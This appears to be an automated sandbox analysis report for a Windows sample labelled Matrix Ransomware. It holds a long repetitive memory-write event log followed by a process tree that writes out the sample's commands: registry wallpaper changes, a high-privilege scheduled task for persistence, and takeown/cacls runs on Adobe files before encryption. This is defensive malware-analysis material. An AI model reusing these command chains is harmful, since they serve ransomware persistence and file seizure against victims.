820 wrote to memory of 236 820 cmd.exe 1221 PID 820 wrote to memory of 236 820 cmd.exe 1221 PID 820 wrote to memory of 236 820 cmd.exe 1221 PID 820 wrote to memory of 236 820 cmd.exe 1221 PID 1436 wrote to memory of 1428 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1222 PID 1436 wrote to memory of 1428 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1222 PID 1436 wrote to memory of 1428 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1222 PID 1436 wrote to memory of 1428 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1222 PID 1428 wrote to memory of 544 1428 cmd.exe 1224 PID 1428 wrote to memory of 544 1428 cmd.exe 1224 PID 1428 wrote to memory of 544 1428 cmd.exe 1224 PID 1428 wrote to memory of 544 1428 cmd.exe 1224 PID 1428 wrote to memory of 1040 1428 cmd.exe 1225 PID 1428 wrote to memory of 1040 1428 cmd.exe 1225 PID 1428 wrote to memory of 1040 1428 cmd.exe 1225 PID 1428 wrote to memory of 1040 1428 cmd.exe 1225 PID 1428 wrote to memory of 1796 1428 cmd.exe 1226 PID 1428 wrote to memory of 1796 1428 cmd.exe 1226 PID 1428 wrote to memory of 1796 1428 cmd.exe 1226 PID 1428 wrote to memory of 1796 1428 cmd.exe 1226 PID 1796 wrote to memory of 792 1796 cmd.exe 1227 PID 1796 wrote to memory of 792 1796 cmd.exe 1227 PID 1796 wrote to memory of 792 1796 cmd.exe 1227 PID 1796 wrote to memory of 792 1796 cmd.exe 1227 PID 1428 wrote to memory of 2020 1428 cmd.exe 1228 PID 1428 wrote to memory of 2020 1428 cmd.exe 1228 PID 1428 wrote to memory of 2020 1428 cmd.exe 1228 PID 1428 wrote to memory of 2020 1428 cmd.exe 1228 PID 1436 wrote to memory of 996 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1229 PID 1436 wrote to memory of 996 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1229 PID 1436 wrote to memory of 996 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1229 PID 1436 wrote to memory of 996 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1229 PID 996 wrote to memory of 1972 996 cmd.exe 1231 PID 996 wrote to memory of 1972 996 cmd.exe 1231 PID 996 wrote to memory of 1972 996 cmd.exe 1231 PID 996 wrote to memory of 1972 996 cmd.exe 1231 PID 996 wrote to memory of 516 996 cmd.exe 1232 PID 996 wrote to memory of 516 996 cmd.exe 1232 PID 996 wrote to memory of 516 996 cmd.exe 1232 PID 996 wrote to memory of 516 996 cmd.exe 1232 PID 996 wrote to memory of 1832 996 cmd.exe 1233 PID 996 wrote to memory of 1832 996 cmd.exe 1233 PID 996 wrote to memory of 1832 996 cmd.exe 1233 PID 996 wrote to memory of 1832 996 cmd.exe 1233 PID 1832 wrote to memory of 1444 1832 cmd.exe 1234 PID 1832 wrote to memory of 1444 1832 cmd.exe 1234 PID 1832 wrote to memory of 1444 1832 cmd.exe 1234 PID 1832 wrote to memory of 1444 1832 cmd.exe 1234 PID 996 wrote to memory of 228 996 cmd.exe 1235 PID 996 wrote to memory of 228 996 cmd.exe 1235 PID 996 wrote to memory of 228 996 cmd.exe 1235 PID 996 wrote to memory of 228 996 cmd.exe 1235 PID 1436 wrote to memory of 1628 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1236 PID 1436 wrote to memory of 1628 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1236 PID 1436 wrote to memory of 1628 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1236 PID 1436 wrote to memory of 1628 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1236 PID 1628 wrote to memory of 204 1628 cmd.exe 1238 PID 1628 wrote to memory of 204 1628 cmd.exe 1238 PID 1628 wrote to memory of 204 1628 cmd.exe 1238 PID 1628 wrote to memory of 204 1628 cmd.exe 1238 PID 1628 wrote to memory of 520 1628 cmd.exe 1239 PID 1628 wrote to memory of 520 1628 cmd.exe 1239 PID 1628 wrote to memory of 520 1628 cmd.exe 1239 PID 1628 wrote to memory of 520 1628 cmd.exe 1239 PID 1628 wrote to memory of 1268 1628 cmd.exe 1240 PID 1628 wrote to memory of 1268 1628 cmd.exe 1240 PID 1628 wrote to memory of 1268 1628 cmd.exe 1240 PID 1628 wrote to memory of 1268 1628 cmd.exe 1240 PID 1268 wrote to memory of 232 1268 cmd.exe 1241 PID 1268 wrote to memory of 232 1268 cmd.exe 1241 PID 1268 wrote to memory of 232 1268 cmd.exe 1241 PID 1268 wrote to memory of 232 1268 cmd.exe 1241 PID 1628 wrote to memory of 1896 1628 cmd.exe 1242 PID 1628 wrote to memory of 1896 1628 cmd.exe 1242 PID 1628 wrote to memory of 1896 1628 cmd.exe 1242 PID 1628 wrote to memory of 1896 1628 cmd.exe 1242 PID 1436 wrote to memory of 748 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1243 PID 1436 wrote to memory of 748 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1243 PID 1436 wrote to memory of 748 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1243 PID 1436 wrote to memory of 748 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1243 PID 748 wrote to memory of 1760 748 cmd.exe 1245 PID 748 wrote to memory of 1760 748 cmd.exe 1245 PID 748 wrote to memory of 1760 748 cmd.exe 1245 PID 748 wrote to memory of 1760 748 cmd.exe 1245 PID 748 wrote to memory of 1548 748 cmd.exe 1246 PID 748 wrote to memory of 1548 748 cmd.exe 1246 PID 748 wrote to memory of 1548 748 cmd.exe 1246 PID 748 wrote to memory of 1548 748 cmd.exe 1246 PID 748 wrote to memory of 652 748 cmd.exe 1247 PID 748 wrote to memory of 652 748 cmd.exe 1247 PID 748 wrote to memory of 652 748 cmd.exe 1247 PID 748 wrote to memory of 652 748 cmd.exe 1247 PID 652 wrote to memory of 220 652 cmd.exe 1248 PID 652 wrote to memory of 220 652 cmd.exe 1248 PID 652 wrote to memory of 220 652 cmd.exe 1248 PID 652 wrote to memory of 220 652 cmd.exe 1248 PID 748 wrote to memory of 912 748 cmd.exe 1249 PID 748 wrote to memory of 912 748 cmd.exe 1249 PID 748 wrote to memory of 912 748 cmd.exe 1249 PID 748 wrote to memory of 912 748 cmd.exe 1249 PID 1436 wrote to memory of 1824 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1250 PID 1436 wrote to memory of 1824 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1250 PID 1436 wrote to memory of 1824 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1250 PID 1436 wrote to memory of 1824 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1250 PID 1824 wrote to memory of 1528 1824 cmd.exe 1252 PID 1824 wrote to memory of 1528 1824 cmd.exe 1252 PID 1824 wrote to memory of 1528 1824 cmd.exe 1252 PID 1824 wrote to memory of 1528 1824 cmd.exe 1252 PID 1824 wrote to memory of 1480 1824 cmd.exe 1253 PID 1824 wrote to memory of 1480 1824 cmd.exe 1253 PID 1824 wrote to memory of 1480 1824 cmd.exe 1253 PID 1824 wrote to memory of 1480 1824 cmd.exe 1253 PID 1824 wrote to memory of 316 1824 cmd.exe 1254 PID 1824 wrote to memory of 316 1824 cmd.exe 1254 PID 1824 wrote to memory of 316 1824 cmd.exe 1254 PID 1824 wrote to memory of 316 1824 cmd.exe 1254 PID 316 wrote to memory of 1460 316 cmd.exe 1255 PID 316 wrote to memory of 1460 316 cmd.exe 1255 PID 316 wrote to memory of 1460 316 cmd.exe 1255 PID 316 wrote to memory of 1460 316 cmd.exe 1255 PID 1824 wrote to memory of 1236 1824 cmd.exe 1256 PID 1824 wrote to memory of 1236 1824 cmd.exe 1256 PID 1824 wrote to memory of 1236 1824 cmd.exe 1256 PID 1824 wrote to memory of 1236 1824 cmd.exe 1256 PID 1436 wrote to memory of 212 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1257 PID 1436 wrote to memory of 212 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1257 PID 1436 wrote to memory of 212 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1257 PID 1436 wrote to memory of 212 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1257 PID 212 wrote to memory of 1572 212 cmd.exe 1259 PID 212 wrote to memory of 1572 212 cmd.exe 1259 PID 212 wrote to memory of 1572 212 cmd.exe 1259 PID 212 wrote to memory of 1572 212 cmd.exe 1259 PID 212 wrote to memory of 1164 212 cmd.exe 1260 PID 212 wrote to memory of 1164 212 cmd.exe 1260 PID 212 wrote to memory of 1164 212 cmd.exe 1260 PID 212 wrote to memory of 1164 212 cmd.exe 1260 PID 212 wrote to memory of 612 212 cmd.exe 1261 PID 212 wrote to memory of 612 212 cmd.exe 1261 PID 212 wrote to memory of 612 212 cmd.exe 1261 PID 212 wrote to memory of 612 212 cmd.exe 1261 PID 612 wrote to memory of 1020 612 cmd.exe 1262 PID 612 wrote to memory of 1020 612 cmd.exe 1262 PID 612 wrote to memory of 1020 612 cmd.exe 1262 PID 612 wrote to memory of 1020 612 cmd.exe 1262 PID 212 wrote to memory of 1828 212 cmd.exe 1263 PID 212 wrote to memory of 1828 212 cmd.exe 1263 PID 212 wrote to memory of 1828 212 cmd.exe 1263 PID 212 wrote to memory of 1828 212 cmd.exe 1263 PID 1436 wrote to memory of 208 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1264 PID 1436 wrote to memory of 208 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1264 PID 1436 wrote to memory of 208 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1264 PID 1436 wrote to memory of 208 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1264 PID 208 wrote to memory of 544 208 cmd.exe 1266 PID 208 wrote to memory of 544 208 cmd.exe 1266 PID 208 wrote to memory of 544 208 cmd.exe 1266 PID 208 wrote to memory of 544 208 cmd.exe 1266 PID 208 wrote to memory of 1040 208 cmd.exe 1267 PID 208 wrote to memory of 1040 208 cmd.exe 1267 PID 208 wrote to memory of 1040 208 cmd.exe 1267 PID 208 wrote to memory of 1040 208 cmd.exe 1267 PID 208 wrote to memory of 1672 208 cmd.exe 1268 PID 208 wrote to memory of 1672 208 cmd.exe 1268 PID 208 wrote to memory of 1672 208 cmd.exe 1268 PID 208 wrote to memory of 1672 208 cmd.exe 1268 PID 1672 wrote to memory of 792 1672 cmd.exe 1269 PID 1672 wrote to memory of 792 1672 cmd.exe 1269 PID 1672 wrote to memory of 792 1672 cmd.exe 1269 PID 1672 wrote to memory of 792 1672 cmd.exe 1269 PID 208 wrote to memory of 1880 208 cmd.exe 1270 PID 208 wrote to memory of 1880 208 cmd.exe 1270 PID 208 wrote to memory of 1880 208 cmd.exe 1270 PID 208 wrote to memory of 1880 208 cmd.exe 1270 PID 1436 wrote to memory of 820 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1271 PID 1436 wrote to memory of 820 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1271 PID 1436 wrote to memory of 820 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1271 PID 1436 wrote to memory of 820 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1271 PID 820 wrote to memory of 1196 820 cmd.exe 1273 PID 820 wrote to memory of 1196 820 cmd.exe 1273 PID 820 wrote to memory of 1196 820 cmd.exe 1273 PID 820 wrote to memory of 1196 820 cmd.exe 1273 PID 820 wrote to memory of 1916 820 cmd.exe 1274 PID 820 wrote to memory of 1916 820 cmd.exe 1274 PID 820 wrote to memory of 1916 820 cmd.exe 1274 PID 820 wrote to memory of 1916 820 cmd.exe 1274 PID 820 wrote to memory of 1292 820 cmd.exe 1275 PID 820 wrote to memory of 1292 820 cmd.exe 1275 PID 820 wrote to memory of 1292 820 cmd.exe 1275 PID 820 wrote to memory of 1292 820 cmd.exe 1275 PID 1292 wrote to memory of 1832 1292 cmd.exe 1276 PID 1292 wrote to memory of 1832 1292 cmd.exe 1276 PID 1292 wrote to memory of 1832 1292 cmd.exe 1276 PID 1292 wrote to memory of 1832 1292 cmd.exe 1276 PID 820 wrote to memory of 860 820 cmd.exe 1277 PID 820 wrote to memory of 860 820 cmd.exe 1277 PID 820 wrote to memory of 860 820 cmd.exe 1277 PID 820 wrote to memory of 860 820 cmd.exe 1277 PID 1436 wrote to memory of 1428 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1278 PID 1436 wrote to memory of 1428 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1278 PID 1436 wrote to memory of 1428 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1278 PID 1436 wrote to memory of 1428 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1278 PID 1428 wrote to memory of 1440 1428 cmd.exe 1280 PID 1428 wrote to memory of 1440 1428 cmd.exe 1280 PID 1428 wrote to memory of 1440 1428 cmd.exe 1280 PID 1428 wrote to memory of 1440 1428 cmd.exe 1280 PID 1428 wrote to memory of 1600 1428 cmd.exe 1281 PID 1428 wrote to memory of 1600 1428 cmd.exe 1281 PID 1428 wrote to memory of 1600 1428 cmd.exe 1281 PID 1428 wrote to memory of 1600 1428 cmd.exe 1281 PID 1428 wrote to memory of 216 1428 cmd.exe 1282 PID 1428 wrote to memory of 216 1428 cmd.exe 1282 PID 1428 wrote to memory of 216 1428 cmd.exe 1282 PID 1428 wrote to memory of 216 1428 cmd.exe 1282 PID 216 wrote to memory of 1152 216 cmd.exe 1283 PID 216 wrote to memory of 1152 216 cmd.exe 1283 PID 216 wrote to memory of 1152 216 cmd.exe 1283 PID 216 wrote to memory of 1152 216 cmd.exe 1283 PID 1428 wrote to memory of 1132 1428 cmd.exe 1284 PID 1428 wrote to memory of 1132 1428 cmd.exe 1284 PID 1428 wrote to memory of 1132 1428 cmd.exe 1284 PID 1428 wrote to memory of 1132 1428 cmd.exe 1284 PID 1436 wrote to memory of 212 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1285 PID 1436 wrote to memory of 212 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1285 PID 1436 wrote to memory of 212 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1285 PID 1436 wrote to memory of 212 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1285 PID 212 wrote to memory of 1388 212 cmd.exe 1287 PID 212 wrote to memory of 1388 212 cmd.exe 1287 PID 212 wrote to memory of 1388 212 cmd.exe 1287 PID 212 wrote to memory of 1388 212 cmd.exe 1287 PID 212 wrote to memory of 1944 212 cmd.exe 1288 PID 212 wrote to memory of 1944 212 cmd.exe 1288 PID 212 wrote to memory of 1944 212 cmd.exe 1288 PID 212 wrote to memory of 1944 212 cmd.exe 1288 PID 212 wrote to memory of 1040 212 cmd.exe 1289 PID 212 wrote to memory of 1040 212 cmd.exe 1289 PID 212 wrote to memory of 1040 212 cmd.exe 1289 PID 212 wrote to memory of 1040 212 cmd.exe 1289 PID 1040 wrote to memory of 1948 1040 cmd.exe 1290 PID 1040 wrote to memory of 1948 1040 cmd.exe 1290 PID 1040 wrote to memory of 1948 1040 cmd.exe 1290 PID 1040 wrote to memory of 1948 1040 cmd.exe 1290 PID 212 wrote to memory of 1580 212 cmd.exe 1291 PID 212 wrote to memory of 1580 212 cmd.exe 1291 PID 212 wrote to memory of 1580 212 cmd.exe 1291 PID 212 wrote to memory of 1580 212 cmd.exe 1291 PID 1436 wrote to memory of 1880 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1292 PID 1436 wrote to memory of 1880 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1292 PID 1436 wrote to memory of 1880 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1292 PID 1436 wrote to memory of 1880 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1292 PID 1880 wrote to memory of 1484 1880 cmd.exe 1294 PID 1880 wrote to memory of 1484 1880 cmd.exe 1294 PID 1880 wrote to memory of 1484 1880 cmd.exe 1294 PID 1880 wrote to memory of 1484 1880 cmd.exe 1294 PID 1880 wrote to memory of 1196 1880 cmd.exe 1295 PID 1880 wrote to memory of 1196 1880 cmd.exe 1295 PID 1880 wrote to memory of 1196 1880 cmd.exe 1295 PID 1880 wrote to memory of 1196 1880 cmd.exe 1295 PID 1880 wrote to memory of 1916 1880 cmd.exe 1296 PID 1880 wrote to memory of 1916 1880 cmd.exe 1296 PID 1880 wrote to memory of 1916 1880 cmd.exe 1296 PID 1880 wrote to memory of 1916 1880 cmd.exe 1296 PID 1916 wrote to memory of 1728 1916 cmd.exe 1297 PID 1916 wrote to memory of 1728 1916 cmd.exe 1297 PID 1916 wrote to memory of 1728 1916 cmd.exe 1297 PID 1916 wrote to memory of 1728 1916 cmd.exe 1297 PID 1880 wrote to memory of 1292 1880 cmd.exe 1298 PID 1880 wrote to memory of 1292 1880 cmd.exe 1298 PID 1880 wrote to memory of 1292 1880 cmd.exe 1298 PID 1880 wrote to memory of 1292 1880 cmd.exe 1298 PID 1436 wrote to memory of 860 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1299 PID 1436 wrote to memory of 860 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1299 PID 1436 wrote to memory of 860 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1299 PID 1436 wrote to memory of 860 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1299 PID 860 wrote to memory of 228 860 cmd.exe 1301 PID 860 wrote to memory of 228 860 cmd.exe 1301 PID 860 wrote to memory of 228 860 cmd.exe 1301 PID 860 wrote to memory of 228 860 cmd.exe 1301 PID 860 wrote to memory of 1440 860 cmd.exe 1302 PID 860 wrote to memory of 1440 860 cmd.exe 1302 PID 860 wrote to memory of 1440 860 cmd.exe 1302 PID 860 wrote to memory of 1440 860 cmd.exe 1302 PID 860 wrote to memory of 1600 860 cmd.exe 1303 PID 860 wrote to memory of 1600 860 cmd.exe 1303 PID 860 wrote to memory of 1600 860 cmd.exe 1303 PID 860 wrote to memory of 1600 860 cmd.exe 1303 PID 1600 wrote to memory of 612 1600 cmd.exe 1304 PID 1600 wrote to memory of 612 1600 cmd.exe 1304 PID 1600 wrote to memory of 612 1600 cmd.exe 1304 PID 1600 wrote to memory of 612 1600 cmd.exe 1304 PID 860 wrote to memory of 216 860 cmd.exe 1305 PID 860 wrote to memory of 216 860 cmd.exe 1305 PID 860 wrote to memory of 216 860 cmd.exe 1305 PID 860 wrote to memory of 216 860 cmd.exe 1305 PID 1436 wrote to memory of 1132 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1306 PID 1436 wrote to memory of 1132 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1306 PID 1436 wrote to memory of 1132 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1306 PID 1436 wrote to memory of 1132 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1306 PID 1132 wrote to memory of 1896 1132 cmd.exe 1308 PID 1132 wrote to memory of 1896 1132 cmd.exe 1308 PID 1132 wrote to memory of 1896 1132 cmd.exe 1308 PID 1132 wrote to memory of 1896 1132 cmd.exe 1308 PID 1132 wrote to memory of 1388 1132 cmd.exe 1309 PID 1132 wrote to memory of 1388 1132 cmd.exe 1309 PID 1132 wrote to memory of 1388 1132 cmd.exe 1309 PID 1132 wrote to memory of 1388 1132 cmd.exe 1309 PID 1132 wrote to memory of 1944 1132 cmd.exe 1310 PID 1132 wrote to memory of 1944 1132 cmd.exe 1310 PID 1132 wrote to memory of 1944 1132 cmd.exe 1310 PID 1132 wrote to memory of 1944 1132 cmd.exe 1310 PID 1944 wrote to memory of 792 1944 cmd.exe 1311 PID 1944 wrote to memory of 792 1944 cmd.exe 1311 PID 1944 wrote to memory of 792 1944 cmd.exe 1311 PID 1944 wrote to memory of 792 1944 cmd.exe 1311 PID 1132 wrote to memory of 1040 1132 cmd.exe 1312 PID 1132 wrote to memory of 1040 1132 cmd.exe 1312 PID 1132 wrote to memory of 1040 1132 cmd.exe 1312 PID 1132 wrote to memory of 1040 1132 cmd.exe 1312
Processes
-
C:\Users\Admin\AppData\Local\Temp\c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe"C:\Users\Admin\AppData\Local\Temp\c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe"1⤵
- Matrix Ransomware
- Modifies extensions of user files
- Loads dropped DLL
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1436 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe" "C:\Users\Admin\AppData\Local\Temp\NWkn2aJw.exe"2⤵PID:1728
-
-
C:\Users\Admin\AppData\Local\Temp\NWkn2aJw.exe"C:\Users\Admin\AppData\Local\Temp\NWkn2aJw.exe" -n2⤵
- Executes dropped EXE
PID:1744
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Q8ZLDLS1.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
PID:840 -
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Q8ZLDLS1.bmp" /f3⤵
- Sets desktop wallpaper using registry
- Modifies Control Panel
PID:1288
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵
- Modifies Control Panel
PID:892
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵
- Modifies Control Panel
PID:1220
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\zcGlT1Lg.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:1056 -
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\zcGlT1Lg.vbs"3⤵PID:1760
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\4HhkjbNs.bat" /sc minute /mo 5 /RL HIGHEST /F4⤵PID:1768
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\4HhkjbNs.bat" /sc minute /mo 5 /RL HIGHEST /F5⤵
- Creates scheduled task(s)
PID:1188
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA4⤵PID:1576
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA5⤵PID:1460
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf""2⤵
- Suspicious use of WriteProcessMemory
PID:2008 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf" /E /G Admin:F /C3⤵PID:604
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf"3⤵PID:1488
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "DefaultID.pdf" -nobanner3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2016 -
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "DefaultID.pdf" -nobanner4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:856 -
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp64.exeWSBgHpvp.exe -accepteula "DefaultID.pdf" -nobanner5⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Enumerates connected drives
- Modifies service
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:1732
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf""2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:336 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf" /E /G Admin:F /C3⤵PID:1132
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"3⤵PID:2020
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "StandardBusiness.pdf" -nobanner3⤵
- Loads dropped DLL
PID:1536 -
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "StandardBusiness.pdf" -nobanner4⤵
- Executes dropped EXE
PID:1768
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1036
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf""2⤵
- Loads dropped DLL
PID:1040 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf" /E /G Admin:F /C3⤵PID:1672
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf"3⤵PID:924
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "ENUtxt.pdf" -nobanner3⤵
- Loads dropped DLL
PID:1748 -
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "ENUtxt.pdf" -nobanner4⤵
- Executes dropped EXE
PID:1800
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1216
-
-
-
